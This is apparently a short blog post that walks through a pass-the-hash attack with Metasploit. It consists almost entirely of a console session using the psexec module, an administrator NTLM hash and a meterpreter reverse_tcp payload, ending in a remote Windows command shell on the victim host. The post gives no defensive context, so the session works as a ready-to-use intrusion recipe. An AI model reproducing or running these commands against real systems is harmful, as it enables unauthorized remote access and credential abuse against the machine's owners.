Pass The Hash Reverse Shell With Metasploit

Kali: 173.18.131.94
Victim: 173.18.131.111

root@kali:/usr/bin# ./msfconsole
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 173.18.131.94
lhost => 173.18.131.94
msf exploit(psexec) > set rhost 173.18.131.111
rhost => 173.18.131.111
msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
msf exploit(psexec) > set smbuser administrator
smbuser => administrator
msf exploit(psexec) > set smbdomain test
smbdomain => test
msf exploit(psexec) > exploit

[*] Started reverse TCP handler on 173.18.131.94:4444
[*] Connecting to the server…
[*] Authenticating to 173.18.131.111:445|test as user ‘administrator’…
[*] Selecting PowerShell target
[*] 173.18.131.111:445 – Executing the payload…
[+] 173.18.131.111:445 – Service start timed out, OK if running a command or non-service executable…
[*] Sending stage (957487 bytes) to 173.18.131.111
[*] Meterpreter session 1 opened (173.18.131.94:4444 -> 173.18.131.111:49811) at 2016-03-09 16:44:58 -0500

meterpreter > shell
Process 2212 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s